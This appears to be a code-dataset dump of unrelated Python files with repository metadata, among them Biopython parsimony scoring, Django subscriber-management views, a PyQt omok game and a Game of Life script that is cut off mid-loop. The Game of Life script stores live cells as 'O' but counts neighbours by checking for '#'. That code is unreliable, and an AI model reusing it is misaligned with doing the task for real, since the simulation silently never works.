sister = parent.clades[1]
# neighbor 1 (parent + right)
del parent.clades[1]
del clade.clades[1]
parent.clades.append(right)
clade.clades.append(sister)
temp_tree = copy.deepcopy(tree)
neighbors.append(temp_tree)
# neighbor 2 (parent + left)
del parent.clades[1]
del clade.clades[0]
parent.clades.append(left)
clade.clades.append(right)
temp_tree = copy.deepcopy(tree)
neighbors.append(temp_tree)
# change back (parent + sister)
del parent.clades[1]
del clade.clades[0]
parent.clades.append(sister)
clade.clades.insert(0, left)
else:
sister = parent.clades[0]
# neighbor 1 (parent + right)
del parent.clades[0]
del clade.clades[1]
parent.clades.insert(0, right)
clade.clades.append(sister)
temp_tree = copy.deepcopy(tree)
neighbors.append(temp_tree)
# neighbor 2 (parent + left)
del parent.clades[0]
del clade.clades[0]
parent.clades.insert(0, left)
clade.clades.append(right)
temp_tree = copy.deepcopy(tree)
neighbors.append(temp_tree)
# change back (parent + sister)
del parent.clades[0]
del clade.clades[0]
parent.clades.insert(0, sister)
clade.clades.insert(0, left)
return neighbors
# ######################## Parsimony Classes ##########################
class ParsimonyScorer(Scorer):
"""Parsimony scorer with a scoring matrix.
This is a combination of Fitch algorithm and Sankoff algorithm.
See ParsimonyTreeConstructor for usage.
:Parameters:
matrix : _Matrix
scoring matrix used in parsimony score calculation.
"""
def __init__(self, matrix=None):
"""Initialize the class."""
if not matrix or isinstance(matrix, _Matrix):
self.matrix = matrix
else:
raise TypeError("Must provide a _Matrix object.")
def get_score(self, tree, alignment):
"""Calculate parsimony score using the Fitch algorithm.
Calculate and return the parsimony score given a tree and the
MSA using either the Fitch algorithm (without a penalty matrix)
or the Sankoff algorithm (with a matrix).
"""
# make sure the tree is rooted and bifurcating
if not tree.is_bifurcating():
raise ValueError("The tree provided should be bifurcating.")
if not tree.rooted:
tree.root_at_midpoint()
# sort tree terminals and alignment
terms = tree.get_terminals()
terms.sort(key=lambda term: term.name)
alignment.sort()
if not all(t.name == a.id for t, a in zip(terms, alignment)):
raise ValueError(
"Taxon names of the input tree should be the same with the alignment.")
# term_align = dict(zip(terms, alignment))
score = 0
for i in range(len(alignment[0])):
# parsimony score for column_i
score_i = 0
# get column
column_i = alignment[:, i]
# skip non-informative column
if column_i == len(column_i) * column_i[0]:
continue
# start calculating score_i using the tree and column_i
# Fitch algorithm without the penalty matrix
if not self.matrix:
# init by mapping terminal clades and states in column_i
clade_states = dict(zip(terms, [{c} for c in column_i]))
for clade in tree.get_nonterminals(order="postorder"):
clade_childs = clade.clades
left_state = clade_states[clade_childs[0]]
right_state = clade_states[clade_childs[1]]
state = left_state & right_state
if not state:
state = left_state | right_state
score_i = score_i + 1
clade_states[clade] = state
# Sankoff algorithm with the penalty matrix
else:
inf = float('inf')
# init score arrays for terminal clades
alphabet = self.matrix.names
length = len(alphabet)
clade_scores = {}
for j in range(len(column_i)):
array = [inf] * length
index = alphabet.index(column_i[j])
array[index] = 0
clade_scores[terms[j]] = array
# bottom up calculation
for clade in tree.get_nonterminals(order="postorder"):
clade_childs = clade.clades
left_score = clade_scores[clade_childs[0]]
right_score = clade_scores[clade_childs[1]]
array = []
for m in range(length):
min_l = inf
min_r = inf
for n in range(length):
sl = self.matrix[
alphabet[m], alphabet[n]] + left_score[n]
sr = self.matrix[
alphabet[m], alphabet[n]] + right_score[n]
if min_l > sl:
min_l = sl
if min_r > sr:
min_r = sr
array.append(min_l + min_r)
clade_scores[clade] = array
# minimum from root score
score_i = min(array)
# TODO: resolve internal states
score = score + score_i
return score
class ParsimonyTreeConstructor(TreeConstructor):
"""Parsimony tree constructor.
:Parameters:
searcher : TreeSearcher
tree searcher to search the best parsimony tree.
starting_tree : Tree
starting tree provided to the searcher.
Examples
--------
>>> from Bio import AlignIO, Phylo
>>> aln = AlignIO.read(open('Tests/TreeConstruction/msa.phy'), 'phylip')
>>> print(aln)
SingleLetterAlphabet() alignment with 5 rows and 13 columns
AACGTGGCCACAT Alpha
AAGGTCGCCACAC Beta
GAGATTTCCGCCT Delta
GAGATCTCCGCCC Epsilon
CAGTTCGCCACAA Gamma
>>> starting_tree = Phylo.read('Tests/TreeConstruction/nj.tre', 'newick')
>>> print(starting_tree)
Tree(weight=1.0, rooted=False)
Clade(branch_length=0.0, name='Inner3')
Clade(branch_length=0.01421, name='Inner2')
Clade(branch_length=0.23927, name='Inner1')
Clade(branch_length=0.08531, name='Epsilon')
Clade(branch_length=0.13691, name='Delta')
Clade(branch_length=0.29231, name='Alpha')
Clade(branch_length=0.07477, name='Beta')
Clade(branch_length=0.17523, name='Gamma')
>>> scorer = ParsimonyScorer()
>>> searcher = NNITreeSearcher(scorer)
>>> constructor = ParsimonyTreeConstructor(searcher, starting_tree)
>>> pars_tree = constructor.build_tree(aln)
>>> print(pars_tree)
Tree(weight=1.0, rooted=True)
Clade(branch_length=0.0)
Clade(branch_length=0.197335, name='Inner1')
Clade(branch_length=0.13691, name='Delta')
Clade(branch_length=0.08531, name='Epsilon')
Clade(branch_length=0.041935, name='Inner2')
Clade(branch_length=0.01421, name='Inner3')
Clade(branch_length=0.17523, name='Gamma')
Clade(branch_length=0.07477, name='Beta')
Clade(branch_length=0.29231, name='Alpha')
"""
def __init__(self, searcher, starting_tree=None):
"""Initialize the class."""
self.searcher = searcher
self.starting_tree = starting_tree
def build_tree(self, alignment):
"""Build the tree.
:Parameters:
alignment : MultipleSeqAlignment
multiple sequence alignment to calculate parsimony tree.
"""
# if starting_tree is none,
# create a upgma tree with 'identity' scoring matrix
if self.starting_tree is None:
dtc = DistanceTreeConstructor(DistanceCalculator("identity"),
"upgma")
self.starting_tree = dtc.build_tree(alignment)
return self.searcher.search(self.starting_tree, alignment)
| [
"adrilabbelol@gmail.com"
] | adrilabbelol@gmail.com |
9cb938048f68b47602170f1e3f23275c9c1e5941 | 9594585cc05dded72740774a3d6058971386dd9a | /boss/core/exc.py | 80e4e91c50c60fee37aa3030542ce45190324e3a | [
"BSD-3-Clause"
] | permissive | derks/boss | 3a22044d9542ba249f95fd7081e86f3451c16134 | 8b81ddfb9b44dab018329a304a5e5a75fa20b060 | refs/heads/master | 2021-01-18T05:37:47.894064 | 2013-06-27T21:01:20 | 2013-06-27T21:01:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | """Boss core exceptions module."""
class BossError(Exception):
"""Generic errors."""
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def __str__(self):
return self.msg
class BossConfigError(BossError):
pass
class BossRuntimeError(BossError):
pass
class BossArgumentError(BossError):
pass
class BossTemplateError(BossError):
pass | [
"wdierkes@rackspace.com"
] | wdierkes@rackspace.com |
0432520283360ee1b0dd7d23b368b1d7c7dead0e | 75320fdf80925dc39f61e14eeca67b1c3d275077 | /min-element-sorted-rotated-array.py | 38ecc510a7b8a267ae6cc38b272011b76a1c1d34 | [] | no_license | HarishK501/100-days-of-coding | 453e260f4bd6bab5578d6db5b9c511d0637bc8ad | 4622e42ce813eb835b48d63396e0dd4772ff9415 | refs/heads/master | 2023-02-15T14:14:05.115654 | 2020-12-28T16:10:26 | 2020-12-28T16:10:26 | 297,650,308 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | def getMin(A):
low = 0
high = len(A) - 1
while low <= high:
mid = (low+high) // 2
if mid - 1 >= 0:
if A[mid-1] > A[mid]:
return "Minimum element = {}".format(A[mid])
elif A[mid] < A[high]:
high = mid
else:
low = mid + 1
else:
return "Minimum element = {}".format(A[0])
def main():
print("Type # to exit.")
while True:
s = input("\nEnter array elements: ")
if s == "#":
break
arr = list(map(int, s.split()))
print(getMin(arr))
return "\nThank You\n"
if __name__ == '__main__':
print(main())
| [
"noreply@github.com"
] | HarishK501.noreply@github.com |
e3ad03ee9c92c6781cc717be48460412daa140bb | ee4feddb2dd410602377e749b56c4d1563ab58ef | /20140409_alignprofile/alignprofile.py | 9577a1758780d9c8d62a961ac0a90e30a2bd635c | [] | no_license | moritzbuck/Pyscratches | 505431b7d141e72d6bb89d52eabd0c37aba6e536 | f0e752abc18017db9dad9f8dde920174bf94d463 | refs/heads/master | 2020-04-06T07:00:13.540303 | 2018-02-12T15:01:07 | 2018-02-12T15:01:07 | 58,471,067 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,209 | py | from Bio import SeqIO
from numpy import median
from numpy import mean
from tqdm import tqdm
import os.path
from pandas import Series
file ="test.fasta"
file ="/home/moritz/dropbox/stability.trim.contigs.good.unique.align"
if not os.path.isfile("coverages.csv") :
print "compute coverages"
if 'coverage' in locals() : del coverage
handle = open(file, "rU")
for record in tqdm(SeqIO.parse(handle, "fasta")) :
seq = str(record.seq)
l = len(seq)
if 'coverage' not in locals():
coverage = [0]*l
for (i,c) in enumerate(seq):
if c not in ['.','-']:
coverage[i] = coverage[i] +1
coverage=Series(coverage)
coverage.to_csv("coverages.csv",index=False)
handle.close()
else :
print "import coverages"
coverage = Series.from_csv("coverages.csv",header=-1, index_col=False)
print "compute median-ish things"
medians = []
means = []
maxs = []
mins = []
lens = []
left = []
right = []
unsure = []
handle = open(file, "rU")
positions=list(coverage[coverage > 500000].index)
l = len(positions)
for record in tqdm(SeqIO.parse(handle, "fasta")) :
seq = str(record.seq)
poss =[]
for (i,c) in enumerate(positions):
if seq[c] not in ['.','-']:
poss.append(i)
if len(poss) >0 :
medians.append(median(poss))
means.append(mean(poss))
mins.append(min(poss))
maxs.append(max(poss))
lens.append(len(poss))
if mean(poss) < 300:
left.append(record)
else :
right.append(record)
else:
unsure.append(record)
handle.close()
Series(medians).to_csv("low_cov_removed_median.csv",index=False)
Series(means).to_csv("low_cov_removed_means.csv",index=False)
Series(maxs).to_csv("low_cov_removed_maxs.csv",index=False)
Series(mins).to_csv("low_cov_removed_mins.csv",index=False)
Series(lens).to_csv("low_cov_removed_lens.csv",index=False)
print "Write fastas"
with open("left_side.fasta","w") as lefty:
SeqIO.write(left,lefty,"fasta")
with open("right_side.fasta","w") as righty:
SeqIO.write(right,righty,"fasta")
with open("unsure.fasta","w") as unsurey:
SeqIO.write(unsure,unsurey,"fasta")
| [
"mrtz.buck@gmail.com"
] | mrtz.buck@gmail.com |
9bf5e88c23ba62c7ced22432faab87c0a1c3156b | 7a73fef9ae426c48573bae41447cef7cb2b97bf6 | /dynamicserialize/dstypes/com/raytheon/uf/common/activetable/request/MergeActiveTableRequest.py | b3377e84d97d8c41ce0f2b475a4807acc2653016 | [
"LicenseRef-scancode-public-domain",
"BSD-3-Clause"
] | permissive | mjames-upc/python-awips | 7f0a80a04457224c9e195b82a95eef4d9b2b3091 | e2b05f5587b02761df3b6dd5c6ee1f196bd5f11c | refs/heads/master | 2020-03-31T03:00:49.540816 | 2018-10-05T23:15:42 | 2018-10-05T23:15:42 | 53,707,817 | 0 | 0 | null | 2017-04-12T18:00:59 | 2016-03-12T01:46:57 | Python | UTF-8 | Python | false | false | 2,304 | py | ##
##
# File auto-generated against equivalent DynamicSerialize Java class
class MergeActiveTableRequest(object):
def __init__(self, incomingRecords=[], tableName='PRACTICE', site=None,
timeOffset=0.0, xmlSource=None, fromIngestAT=False,
makeBackups=True):
self.incomingRecords = incomingRecords
self.site = site
self.tableName = tableName.upper() if tableName.upper() in ['OPERATIONAL', 'PRACTICE'] else 'PRACTICE'
self.timeOffset = float(timeOffset)
self.xmlSource = xmlSource
self.fromIngestAT = bool(fromIngestAT)
self.makeBackups = bool(makeBackups)
def __repr__(self):
retVal = "MergeActiveTableRequest("
retVal += repr(self.incomingRecords) + ", "
retVal += repr(self.tableName) + ", "
retVal += repr(self.site) + ", "
retVal += repr(self.timeOffset) + ", "
retVal += repr(self.xmlSource) + ", "
retVal += repr(self.fromIngestAT) + ", "
retVal += repr(self.makeBackups) + ")"
return retVal
def __str__(self):
return self.__repr__()
def getIncomingRecords(self):
return self.incomingRecords
def setIncomingRecords(self, incomingRecords):
self.incomingRecords = incomingRecords
def getTableName(self):
return self.tableName
def setTableName(self, tableName):
value = tableName.upper()
if value not in ['OPERATIONAL', 'PRACTICE']:
raise ValueError("Invalid value " + tableName + " specified for ActiveTableMode.")
self.tableName = value
def getSite(self):
return self.site
def setSite(self, site):
self.site = site
def getTimeOffset(self):
return self.timeOffset
def setTimeOffset(self, timeOffset):
self.timeOffset = float(timeOffset)
def getXmlSource(self):
return self.xmlSource
def setXmlSource(self, xmlSource):
self.xmlSource = xmlSource
def getFromIngestAT(self):
return self.fromIngestAT
def setFromIngestAT(self, fromIngestAT):
self.fromIngestAT = bool(fromIngestAT)
def getMakeBackups(self):
return self.makeBackups
def setMakeBackups(self, makeBackups):
self.makeBackups = bool(makeBackups)
| [
"mjames@unidata.ucar.edu"
] | mjames@unidata.ucar.edu |
effd5764d0ea463c16b0501afa0007efd6db1203 | 2422ee49450d11f318a501ed22a77ca1efa586c9 | /HELLOPYTHON/day08/myomok01.py | 607b632cf74bd9020b54a799999adcb6aa3def64 | [] | no_license | Jinny-s/ddit_python_backUp | aefc371afbc4f8d7bdff90682b3fe6bdd93a8c1b | 3fb62e69574b98f8ee935ffff9f37e324a17f771 | refs/heads/master | 2023-05-11T21:48:28.412306 | 2021-05-28T00:13:12 | 2021-05-28T00:13:12 | 369,527,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,439 | py | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication
from PyQt5 import uic, QtGui
from PyQt5.Qt import QPushButton, QSize, QRect
form_class = uic.loadUiType("myomok01.ui")[0]
class MyWindow(QMainWindow, form_class):
def __init__(self):
super().__init__()
self.setupUi(self)
self.flag_wb = True
self.pb_reset.clicked.connect(self.pbReset)
self.arr2D = [
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0]
]
self.pb2D = []
for i in range(10):
pb_line = []
for j in range(10):
tmp = QPushButton(self)
tmp.setToolTip(str(i)+","+str(j))
tmp.setIcon(QtGui.QIcon('0.png'))
tmp.setIconSize(QSize(40, 40))
tmp.setGeometry(QRect(40*j,40*i, 40, 40))
tmp.clicked.connect(self.btnClick)
pb_line.append(tmp)
self.pb2D.append(pb_line)
self.myrender()
def myrender(self):
for i in range(10):
for j in range(10):
if self.arr2D[i][j] == 1:
self.pb2D[i][j].setIcon(QtGui.QIcon('1.png'))
elif self.arr2D[i][j] == 2:
self.pb2D[i][j].setIcon(QtGui.QIcon('2.png'))
else:
self.pb2D[i][j].setIcon(QtGui.QIcon('0.png'))
def btnClick(self):
tg = self.sender().toolTip()
i = int(tg.split(',')[0])
j = int(tg.split(',')[1])
if self.arr2D[i][j] > 0:
return
if self.flag_wb:
self.arr2D[i][j] = 1
else:
self.arr2D[i][j] = 2
self.flag_wb = not self.flag_wb
self.myrender()
def pbReset(self):
for i in range(10):
for j in range(10):
self.arr2D[i][j] = 0
self.flag_wb = True
self.myrender()
if __name__ == '__main__':
app = QApplication(sys.argv)
mywindow = MyWindow()
mywindow.show()
app.exec_() | [
"46083003+Jinny-s@users.noreply.github.com"
] | 46083003+Jinny-s@users.noreply.github.com |
7a5c1835b9399907b133264cb54216162991db72 | 0a775e8d1057b2608a8d46499124105776ff4062 | /web/manage.py | c5cff1a9dce87821e9827c52812f60cd4df2e7c3 | [
"MIT"
] | permissive | x5g/CubeSolver | f3a1ad6e5e3bd5a2becc10a002d473f2902ec867 | 451ae8f580038d3840cd9279cbdbcd2c13f5045d | refs/heads/master | 2022-07-19T06:59:53.505115 | 2021-04-30T16:09:47 | 2021-04-30T16:09:47 | 217,885,447 | 1 | 1 | MIT | 2022-06-22T02:38:46 | 2019-10-27T16:44:49 | Python | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CubeSolver.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"1098766468@qq.com"
] | 1098766468@qq.com |
5a2be43121e2fbabfc3199ed5c3014b5bf1cd034 | 803ff496aff9eef77f3186991878b6f16e54ba0a | /customer_support/views.py | 83fd375d8b727d67dc000ab4457b99c6ea137792 | [] | no_license | gopal1992/ssadmin | c54dae22dd69e48730affc1cdba0c0ee17b1e48c | 96370e8fc108843a70b326d5b136be94ae0b3084 | refs/heads/master | 2016-09-09T22:44:35.003945 | 2015-01-24T10:15:12 | 2015-01-24T10:15:12 | 29,772,729 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 18,570 | py | # -*- coding: utf-8 -*-
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import render, redirect
from django.views.decorators.http import require_http_methods
from django.views.generic import TemplateView
from django.views.generic.edit import FormView, UpdateView
from accounts.services import (create_user_without_password,
grant_privilege)
from dal.registration import get_list_latest_internal_sid_subscribers
from ip_analysis.models import UserSubscriber, Subscriber
from service_layer.registration import get_unique_external_sid
from user_analysis.models import SubscriberPageAuth, PagesList, PageAuthAction
from utils.account import ShieldSquareUserMixin
from utils.email import send_templated_email
from .forms import (NewSubscriberForm,
UpdateSubscriberForm,
EditSubscriberForm,
NewUserForm,
DeActivateSubscriberForm,
ReActivateSubscriberForm,
SupportSubscriberReportForm,)
from .service import send_new_user_email
# Create your views here.
class NewUserView(ShieldSquareUserMixin, FormView):
form_class = NewUserForm
template_name = 'new_user.html'
def send_email(self, email):
msg = u"You have created a new user {}".format(email)
send_templated_email(label="customer_support",
to=self.request.user.email,
context={'user_name':self.request.user,'msg': msg})
def form_valid(self, form):
username = form.cleaned_data['username']
email = form.cleaned_data['email']
privilege = form.cleaned_data['privilege']
subscriber = form.cleaned_data['subscriber']
user = create_user_without_password(email, username)
if user:
grant_privilege(user, privilege)
UserSubscriber.objects.create(user=user, subscriber=subscriber)
self.send_email(email)
# comes from service.py
send_new_user_email(self.request, user)
messages.success(self.request,
u"{} successfully created.".format(email))
return render(self.request, self.template_name)
def form_invalid(self, form):
return render(self.request, self.template_name, {'form': form})
class NewSubscriberView(ShieldSquareUserMixin, FormView):
form_class = NewSubscriberForm
template_name = "new_subscriber.html"
def send_email(self, name):
msg = u"You have created a new subscriber {}".format(name)
return send_templated_email(label="customer_support",
to=self.request.user.email,
context={'user_name':self.request.user,'msg': msg})
def form_valid(self, form):
subscriber = form.save(commit=True)
self.send_email(subscriber.name)
user = create_user_without_password(subscriber.email)
if user:
send_new_user_email(self.request, user)
grant_privilege(user, "admin")
UserSubscriber.objects.create(user=user, subscriber=subscriber)
messages.success(
self.request,
u"Successfully created subscriber {}".format(subscriber.name)
)
else:
messages.error(
self.requet,
u"Unable to create user {}".format(subscriber.email)
)
return render(self.request, self.template_name)
return redirect(reverse('support.dashboard'))
class UpdateSubscriberView(ShieldSquareUserMixin, UpdateView):
model = Subscriber
form_class = UpdateSubscriberForm
template_name = "update_subscriber.html"
def send_email(self, name):
msg = u"You have updated subscriber {} details".format(name)
return send_templated_email(label="customer_support",
to=self.request.user.email,
context={'user_name':self.request.user,'msg': msg})
def form_valid(self, form):
subscriber = form.save(commit=True)
self.send_email(subscriber.name)
messages.success(self.request,
u"Successfully edited subscriber {}".format(
subscriber.name))
return redirect(reverse('support.dashboard'))
class EditSubscriberView(ShieldSquareUserMixin, FormView):
# view to select to subscriber actual update happens in UpdateSubscriberView
form_class = EditSubscriberForm
template_name = "edit_subscriber.html"
def form_valid(self, form):
subscriber = form.cleaned_data['subscriber']
return redirect(reverse('support.update_subscriber',
kwargs={'pk': subscriber.internal_sid}))
class DeActivateSubscriberView(ShieldSquareUserMixin, FormView):
form_class = DeActivateSubscriberForm
template_name = "deactivate_subscriber.html"
def send_email(self, name):
msg = u"You have disabled the subscriber {}".format(name)
return send_templated_email(label="customer_support",
to=self.request.user.email,
context={'user_name':self.request.user,'msg': msg})
def deactivate_all_associated_users(self, subscriber):
for user_subscriber in UserSubscriber.objects.filter(subscriber=subscriber):
user_subscriber.user.is_active = False
user_subscriber.user.save()
def form_valid(self, form):
subscriber = form.cleaned_data['subscriber']
subscriber.status = 0
subscriber.save()
self.deactivate_all_associated_users(subscriber)
messages.success(self.request,
u"{} is disabled".format(subscriber.name))
self.send_email(subscriber.name)
return redirect(reverse('support.dashboard'))
class ReActivateSubscriberView(ShieldSquareUserMixin, FormView):
form_class = ReActivateSubscriberForm
template_name = "reactivate_subscriber.html"
def send_email(self, name):
msg = u"You have enabled the subscriber {}".format(name)
return send_templated_email(label="customer_support",
to=self.request.user.email,
context={'user_name':self.request.user,'msg': msg})
def deactivate_all_associated_users(self, subscriber):
for user_subscriber in UserSubscriber.objects.filter(subscriber=subscriber):
user_subscriber.user.is_active = True
user_subscriber.user.save()
def form_valid(self, form):
subscriber = form.cleaned_data['subscriber']
subscriber.status = 1
subscriber.save()
self.deactivate_all_associated_users(subscriber)
messages.success(self.request,
u"{} is enabled".format(subscriber.name))
self.send_email(subscriber.name)
return redirect(reverse('support.dashboard'))
class SupportSubscriberReportView(ShieldSquareUserMixin, FormView):
form_class = SupportSubscriberReportForm
template_name = "support_report.html"
def form_valid(self, form):
subscriber = form.cleaned_data['subscriber']
self.request.session['sid'] = subscriber.internal_sid
self.request.session['subscriber_name'] = subscriber.name
report_url = form.cleaned_data['reports']
return redirect(report_url)
class DashboardView(ShieldSquareUserMixin, TemplateView):
template_name = "support_dashboard.html"
@require_http_methods(["GET", "POST"])
def add_new_subscriber(request):
form = NewSubscriberForm()
if request.method == 'GET':
return render(request, 'new_subscriber.html', {'form' : form})
form = NewSubscriberForm(request.POST)
if form.is_valid():
latest_internal_sid = get_list_latest_internal_sid_subscribers()
external_sid = get_unique_external_sid()
new_external_sid = str(external_sid[0])
new_sb_external_sid = str(external_sid[1])
sid = Subscriber.objects.create(internal_sid = latest_internal_sid + 2,
external_sid = new_external_sid,
mini_uuid = new_external_sid.split('-')[3],
name = form.cleaned_data['name'],
site_url = form.cleaned_data['site_url'],
address1 = form.cleaned_data['address1'],
address2 = form.cleaned_data['address2'],
phone1 = form.cleaned_data['phone1'],
phone2 = form.cleaned_data['phone2'],
email = form.cleaned_data['email'],
status = form.cleaned_data['status'],
timezone = form.cleaned_data['timezone'],
r_Pagepermin = form.cleaned_data['r_Pagepermin'],
r_browserIntgrity = form.cleaned_data['r_browserIntgrity'],
r_httpRequestIntegrity = form.cleaned_data['r_httpRequestIntegrity'],
r_Aggregator = form.cleaned_data['r_Aggregator'],
r_behaviourIntegrity = form.cleaned_data['r_behaviourIntegrity'],
mode = form.cleaned_data['mode'],
sb_internal_sid = latest_internal_sid + 3,
sb_external_sid = new_sb_external_sid,
sb_mini_uuid = new_sb_external_sid.split('-')[3]
)
SubscriberPageAuth.objects.create(sid = sid,
page_id = PagesList.objects.get(id = 1),
auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['user_access_page'] else 2))
SubscriberPageAuth.objects.create(sid = sid,
page_id = PagesList.objects.get(id = 2),
auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['user_analysis_page'] else 2))
SubscriberPageAuth.objects.create(sid = sid,
page_id = PagesList.objects.get(id = 3),
auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['ip_analysis_page'] else 2))
SubscriberPageAuth.objects.create(sid = sid,
page_id = PagesList.objects.get(id = 4),
auth_id = PageAuthAction.objects.get(id = 1 if form.cleaned_data['ip_access_page'] else 2))
# Email
msg = u"You have created a new subscriber {}".format(sid.name)
send_templated_email(label="customer_support",
to=request.user.email,
context={'user_name':request.user,'msg': msg})
user = create_user_without_password(sid.email)
if user:
send_new_user_email(request, user)
grant_privilege(user, "admin")
UserSubscriber.objects.create(user=user, subscriber=sid)
messages.success(
request,
u"Successfully created subscriber {}".format(sid.name)
)
else:
messages.error(
request,
u"Unable to create user {}".format(sid.email)
)
return render(request, 'new_subscriber.html')
return redirect(reverse('support.dashboard'))
return render(request, 'new_subscriber.html', {'form' : form})
@require_http_methods(["GET", "POST"])
def update_existing_subscriber(request, pk):
form = UpdateSubscriberForm()
sid = Subscriber.objects.get(pk = pk)
if request.method == 'GET':
user_access_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 1))
user_analysis_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 2))
ip_access_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 3))
ip_analysis_page = SubscriberPageAuth.objects.get(sid=sid, page_id = PagesList.objects.get(id = 4))
form = UpdateSubscriberForm( initial = {
'name' : sid.name,
'address1' : sid.address1,
'address2' : sid.address2,
'phone1' : sid.phone1,
'phone2' : sid.phone2,
'status' : sid.status,
'timezone' : sid.timezone,
'pagepermin' : sid.pagepermin,
'pagepersess' : sid.pagepersess,
'sesslength' : sid.sesslength,
'r_Pagepermin' : sid.r_Pagepermin,
'r_pagepersess' : sid.r_pagepersess,
'r_sesslength' : sid.r_sesslength,
'r_browserIntgrity' : sid.r_browserIntgrity,
'r_httpRequestIntegrity' : sid.r_httpRequestIntegrity,
'r_Aggregator' : sid.r_Aggregator,
'r_behaviourIntegrity' : sid.r_behaviourIntegrity,
'mode' : sid.mode,
'user_access_page' : True if user_access_page.auth_id.id==1 else False,
'user_analysis_page' : True if user_analysis_page.auth_id.id==1 else False,
'ip_access_page' : True if ip_access_page.auth_id.id==1 else False,
'ip_analysis_page' : True if ip_analysis_page.auth_id.id==1 else False,
})
return render(request, 'update_subscriber.html', {'form' : form,
'internal_sid' : sid.internal_sid,
'external_sid' : sid.external_sid,})
form = UpdateSubscriberForm(request.POST)
if form.is_valid():
sid = Subscriber.objects.get(pk = pk)
sid.name = form.cleaned_data['name']
sid.address1 = form.cleaned_data['address1']
sid.address2 = form.cleaned_data['address2']
sid.phone1 = form.cleaned_data['phone1']
sid.phone2 = form.cleaned_data['phone2']
sid.status = form.cleaned_data['status']
sid.timezone = form.cleaned_data['timezone']
sid.r_Pagepermin = form.cleaned_data['r_Pagepermin']
sid.r_browserIntgrity = form.cleaned_data['r_browserIntgrity']
sid.r_httpRequestIntegrity = form.cleaned_data['r_httpRequestIntegrity']
sid.r_Aggregator = form.cleaned_data['r_Aggregator']
sid.r_behaviourIntegrity = form.cleaned_data['r_behaviourIntegrity']
sid.mode = form.cleaned_data['mode']
sid.save()
user_access_page = SubscriberPageAuth.objects.get(sid = sid,
page_id = PagesList.objects.get(id = 1))
user_analysis_page = SubscriberPageAuth.objects.get(sid = sid,
page_id = PagesList.objects.get(id = 2))
ip_access_page = SubscriberPageAuth.objects.get(sid = sid,
page_id = PagesList.objects.get(id = 3))
ip_analysis_page = SubscriberPageAuth.objects.get(sid = sid,
page_id = PagesList.objects.get(id = 4))
user_access_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['user_access_page'] else 0)
user_analysis_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['user_analysis_page'] else 0)
ip_access_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['ip_access_page'] else 0)
ip_analysis_page.auth_id = PageAuthAction.objects.get(auth_action = 1 if form.cleaned_data['ip_analysis_page'] else 0)
user_access_page.save()
user_analysis_page.save()
ip_access_page.save()
ip_analysis_page.save()
# Email
msg = u"You have updated subscriber {} details".format(sid.name)
send_templated_email(label="customer_support",
to=request.user.email,
context={'user_name':request.user,'msg': msg})
messages.success(request, u"Successfully edited subscriber {}".format(sid.name))
return redirect(reverse('support.dashboard'))
return render(request, 'update_subscriber.html', {'form' : form,
'internal_sid' : sid.internal_sid,
'external_sid' : sid.external_sid,}) | [
"git@github.com"
] | git@github.com |
fa828b53566c090450afc3f58298ab733534ac3e | 11cf40946c55b47886cfe8777916a17db82c2309 | /conways1.py | a2da35410469f1db5aecd4755355f109e8add686 | [] | no_license | dalalsunil1986/python_the_hard_way_exercises | fc669bf2f823a4886f0de717d5f1ca0d0233f6af | bc329999490dedad842e23e8447623fd0321ffe0 | refs/heads/master | 2023-05-03T01:35:24.097087 | 2021-05-16T00:43:56 | 2021-05-16T00:43:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,840 | py | # Conway's Game of Life
import random, time, copy
WIDTH = 60
HEIGHT = 20
# Create a list of list for the cells:
nextCells = []
for x in range(WIDTH):
column = [] # Create a new column.
for y in range(HEIGHT):
if random.randint(0, 1) == 0:
column.append('O') # Add a living cell.
else:
column.append(' ') # Add a dead cell.
nextCells.append(column) # nextCells is a list of column lists.
while True: # Main program loop.
print('\n\n\n\n\n') # Separate each step with newlines.
currentCells = copy.deepcopy(nextCells)
# Print currentCells on the screen:
for y in range(HEIGHT):
for x in range(WIDTH):
print(currentCells[x][y], end='') # Print the 'O' or space.
print() # Print a newline at the end of the row.
# Calculate next step's cells based on current step's cells:
for x in range(WIDTH):
for y in range(HEIGHT):
# Get neighboring coordinates:
# '% WIDTH' ensures leftCoord is always between 0 and WIDTH -1
leftCoord = (x - 1) % WIDTH
rightCoord = (x + 1) % WIDTH
aboveCoord = (y - 1) % HEIGHT
belowCoord = (y + 1) % HEIGHT
# Count number of living neighbors:
numNeighbors = 0
if currentCells[leftCoord][aboveCoord] == '#':
numNeighbors += 1 # Top-left neighbor is alive.
if currentCells[x][aboveCoord] == '#':
numNeighbors += 1 # Top neighbor is alive.
